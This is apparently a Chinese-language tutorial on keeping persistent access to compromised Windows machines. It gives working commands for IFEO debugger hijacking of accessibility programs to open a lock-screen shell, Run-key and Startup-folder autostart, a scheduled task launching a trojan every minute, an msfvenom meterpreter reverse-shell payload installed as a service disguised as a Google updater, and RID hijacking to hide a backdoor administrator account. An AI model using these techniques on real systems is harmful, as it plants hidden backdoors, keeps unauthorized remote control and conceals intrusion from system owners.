Windows权限维持

一，IFEO镜像劫持

1，手动实现

修改IFEO列表文件中的参数debugger实现偷梁换柱

1.win+r，输入regedit，打开注册表，寻找

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

2.（举例修改IE浏览器为cmd）在上述注册表寻找到iexplore.exe（IE浏览器）右键新建创建字符串值，名称必须为Debugger，且赋值cmd.exe的执行路径，即：C：\\windows\system32\cmd.exe

3.点击IE浏览器即可打开cmd

4.这里需要更换不用登陆就能运行的程序

        如：shift（sethc），屏幕键盘（osk），辅助工具管理器（utilman），讲述人(narrator)等,但是并不是所有程序都可以在注册表看到，所以使用命令来创建注册表，然后更改，这样即可在锁屏状态下打开cmd

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

5.要是目标机器允许远程桌面连接，且没有勾选身份验证，则可以利用攻击机进行远程连接，然后点击更换后的程序打开cmd

2，metasploit实现

先实现上线，然后使用模块sticky_keys

提示按shift5次

成功

二，开机自启动

1.metasploit

之前有模块persistence，但是由于使用该模块会在目标机器上上传vbs，然后会替换到vbs，但是metasploit设置错误，模块也很老，所以并不能正确启动vbs，要么二开metasploit，使其把启动方式换成wscript xxx.vbs,要么手动上传xxx.exe，

1）使用metasploit命令

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run（查询开机自启动项）
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v Update -d 'C:\Users\Administrator\Desktop\zpp.exe'(设置开机自启动项)

此时再查看开机自启动项，发现添加成功，修改的路径为

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
或
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

重启靶机，再次上线

2）使用cmd命令

reg query HKLM\software\microsoft\windows\currentversion\run（查询开机自启动项）
reg add HKLM\software\microsoft\windows\currentversion\run /v Update /t REG_SZ /d "C:\Users\Administrator\Desktop\zpp.exe"（添加开机自启动项）

再次重启，成功上线

三，服务后门

首先先上线，然后生成一个木马（该木马是伪装的exe）

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.58.144 lport=8989 -f exe-service -o Update.exe 

创建名为UpdateService的服务，执行木马

sc create GoogleUpdateService binPath= "C:\Users\Administrator\Desktop\Update.exe" displayname= "UpdateService" start= auto

重启，上线

四，文件夹启动

将后门木马放入以下文件夹，则可实现开机自启

C:\Users\{UserName}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

五，schtasks计划任

schtasks /create /sc MINUTE /mo 1 /tr C:\Users\Administrator\Desktop\6666.exe /tn test

schtasks /create（创建新的计划任务）

/sc schedule（指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON ONIDLE）

/mo modifier（指定任务在其计划类型内的运行频率）

/tr <TaskRun>（指定任务运行的程序或命令）

/tn <TaskName>（指定任务的名称）

六，RID劫持

也可以叫做镜子账户，创建一个账户，然后进入

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

修改固定偏移地址,即进入刚创建的账户，把F值的F2 03改为 F4 01就好，导出Users下面的后门账户以及Names下面的后门账户一共两个注册表文件，然后用命令删除账户，再次导入注册表，这样除了注册表外，其他地方看不到该账户信息